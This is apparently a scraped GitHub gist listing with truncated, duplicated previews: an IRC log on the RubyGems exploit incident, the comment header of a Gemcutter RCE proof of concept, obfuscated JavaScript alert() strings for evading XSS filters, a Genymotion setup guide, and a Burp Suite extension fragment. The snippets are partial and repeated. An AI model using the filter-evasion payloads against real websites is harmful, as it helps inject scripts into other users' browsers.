Mike McCabe mccabe615

## gist:4677820

Status #rubygemsX
[Status: @rubygems_status and http://status.rubygems.org | RubyGems 1.8.24 | http://rubygems.org/ | Idle for answers if it's not Pacific Time daytime]
[14:29] == Nilla_ [429948b1@gateway/web/freenode/ip.66.153.72.177] has joined #rubygems
[14:29] <mephux> wlll: it's a huge concern but once we do some forensics we'll know 100%
[14:29] == withloudhands [~robertwhi@rrcs-184-75-101-229.nyc.biz.rr.com] has joined #rubygems
[14:29] <Defiler> evan: I was thinking about adding a type whitelist to the YAML deserialization in rubygems; does that conflict with any of today's ongoing work?
[14:30] <benchMark> evan: Did you guys delete the exploit gem?
[14:30] <benchMark> I was expecting to see that in my grep.
[14:30] == nhocki_ [12bd2d9d@gateway/web/freenode/ip.18.189.45.157] has joined #rubygems

## gemcutter_rce.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept RCE exploit against Gemcutter
#
# ## Advisory
#
# ## Caveats
#
# ## Synopsis
#

## rails_json_cookie_session_store.rb
# Fork of MessageVerifier from Rails 3.2.3
# https://raw.github.com/rails/rails/f3e1b21ca91afbd97f33d1e51808dd320d82b4de/activesupport/lib/active_support/message_verifier.rb
# Author: Jeff Yip (jeffyip)
# This should work with Rails 3.0 - Rails 3.2

require 'active_support/base64'
require 'active_support/deprecation'
require 'active_support/core_ext/object/blank'

module ActiveSupport

## gist:8230805
window:
window["alert"]("ISR")
window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window["ale"+"\x72\x74"]()
window["\x61\x6c\x65\x72\x74"]()
window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
window['ale'+'\x72\x74']()
window['\x61\x6c\x65\x72\x74']()
window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]

## gist:8411428
Genymotion is a Virtual Android Environment built on x86 and Virtualbox. It's not an ARM emulator so it's performance is way better than the Android SDK Emulator. However in their latest update they've removed both ARM Translation and Google Play Apps. (This is what causes the "INSTALL_FAILED_CPU_ABI_INCOMPATIBLE" errors) Many Devs and Users still find these features very useful for various reasons and their removal has forced people to look for alternatives to Genymotion.

This guide is for getting back both ARM Translation and Google Play apps in your Genymotion VM.

UPDATE-v1.1: I've gotten more up-to-date builds of libhoudini and have updated the ZIP. This fixes a lot of app crashes and hangs. Just flash the new one and it should work.
Download the following ZIPs:
ARM Translation Installer v1.1 - http://goo.gl/JBQmPa(Mirrors) ON DROPBOX
Download the correct GApps for your Android version:
Google Apps for Android 4.3 - http://goo.im/gapps/gapps-jb-20130813-signed.zip ON DROPBOX
Google Apps for Android 4.2

## gist:8598298
56k: "https://123.campfirenow.com/images/56k.gif"
bell: ":bell:"
bezos: ":laughing::thought_balloon:"
bueller: "anyone?"
clowntown: "https://123.campfirenow.com/images/clowntown.gif"
cottoneyejoe: ":notes::hear_no_evil::notes:"
crickets: "hears crickets chirping"
dadgummit: "dad gummit!! :fishing_pole_and_fish:"
dangerzone: "https://123.campfirenow.com/images/dangerzone.png"
danielsan: ":fireworks: :trophy: :fireworks:"

## AssessmentChecklist.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                mccabe615
                / AssessmentChecklist.md
            
            
              Created
              February 5, 2014 14:38
            
              
                Assessment Checklist
              
          
    ##OWASP Top Ten##
###A1 Injection###


## Listener
// IHttpListener
@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)

## gist:8860871
toolFlag - used to determine which tool in Burp the request is coming from. In our case the tool flag for Intruder is 32.
messageIsRequest - this boolean value will be true for a message request and false for a message response
messageInfo - this holds the full data of the message itself
byte[] request_byte = messageInfo.getRequest();
IParameter sig_param = helpers.getRequestParameter(request_byte, "signature");

## gist:8860891
if (toolFlag == 32 messageIsRequest !sig_param.equals(null))
{
String param1 = helpers.getRequestParameter(request_byte, "param1").getValue();
String param2 = helpers.getRequestParameter(request_byte, "param2").getValue();
String param3 = helpers.getRequestParameter(request_byte, "param3").getValue();

	Status #rubygemsX
	[Status: @rubygems_status and http://status.rubygems.org \| RubyGems 1.8.24 \| http://rubygems.org/ \| Idle for answers if it's not Pacific Time daytime]
	[14:29] == Nilla_ [429948b1@gateway/web/freenode/ip.66.153.72.177] has joined #rubygems
	[14:29] <mephux> wlll: it's a huge concern but once we do some forensics we'll know 100%
	[14:29] == withloudhands [~robertwhi@rrcs-184-75-101-229.nyc.biz.rr.com] has joined #rubygems
	[14:29] <Defiler> evan: I was thinking about adding a type whitelist to the YAML deserialization in rubygems; does that conflict with any of today's ongoing work?
	[14:30] <benchMark> evan: Did you guys delete the exploit gem?
	[14:30] <benchMark> I was expecting to see that in my grep.
	[14:30] == nhocki_ [12bd2d9d@gateway/web/freenode/ip.18.189.45.157] has joined #rubygems
	#!/usr/bin/env ruby
	#
	# Proof-of-Concept RCE exploit against Gemcutter
	#
	# ## Advisory
	#
	# ## Caveats
	#
	# ## Synopsis
	#
	# Fork of MessageVerifier from Rails 3.2.3
	# https://raw.github.com/rails/rails/f3e1b21ca91afbd97f33d1e51808dd320d82b4de/activesupport/lib/active_support/message_verifier.rb
	# Author: Jeff Yip (jeffyip)
	# This should work with Rails 3.0 - Rails 3.2

	require 'active_support/base64'
	require 'active_support/deprecation'
	require 'active_support/core_ext/object/blank'

	module ActiveSupport
	window:
	window["alert"]("ISR")
	window["ale"+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
	window["ale"+"\x72\x74"]()
	window["\x61\x6c\x65\x72\x74"]()
	window['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
	window['ale'+'\x72\x74']()
	window['\x61\x6c\x65\x72\x74']()
	window[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))
	window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
	Genymotion is a Virtual Android Environment built on x86 and Virtualbox. It's not an ARM emulator so it's performance is way better than the Android SDK Emulator. However in their latest update they've removed both ARM Translation and Google Play Apps. (This is what causes the "INSTALL_FAILED_CPU_ABI_INCOMPATIBLE" errors) Many Devs and Users still find these features very useful for various reasons and their removal has forced people to look for alternatives to Genymotion.

	This guide is for getting back both ARM Translation and Google Play apps in your Genymotion VM.

	UPDATE-v1.1: I've gotten more up-to-date builds of libhoudini and have updated the ZIP. This fixes a lot of app crashes and hangs. Just flash the new one and it should work.
	Download the following ZIPs:
	ARM Translation Installer v1.1 - http://goo.gl/JBQmPa(Mirrors) ON DROPBOX
	Download the correct GApps for your Android version:
	Google Apps for Android 4.3 - http://goo.im/gapps/gapps-jb-20130813-signed.zip ON DROPBOX
	Google Apps for Android 4.2
	56k: "https://123.campfirenow.com/images/56k.gif"
	bell: ":bell:"
	bezos: ":laughing::thought_balloon:"
	bueller: "anyone?"
	clowntown: "https://123.campfirenow.com/images/clowntown.gif"
	cottoneyejoe: ":notes::hear_no_evil::notes:"
	crickets: "hears crickets chirping"
	dadgummit: "dad gummit!! :fishing_pole_and_fish:"
	dangerzone: "https://123.campfirenow.com/images/dangerzone.png"
	danielsan: ":fireworks: :trophy: :fireworks:"
	// IHttpListener
	@Override
	public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)
	toolFlag - used to determine which tool in Burp the request is coming from. In our case the tool flag for Intruder is 32.
	messageIsRequest - this boolean value will be true for a message request and false for a message response
	messageInfo - this holds the full data of the message itself
	byte[] request_byte = messageInfo.getRequest();
	IParameter sig_param = helpers.getRequestParameter(request_byte, "signature");
	if (toolFlag == 32 messageIsRequest !sig_param.equals(null))
	{
	String param1 = helpers.getRequestParameter(request_byte, "param1").getValue();
	String param2 = helpers.getRequestParameter(request_byte, "param2").getValue();
	String param3 = helpers.getRequestParameter(request_byte, "param3").getValue();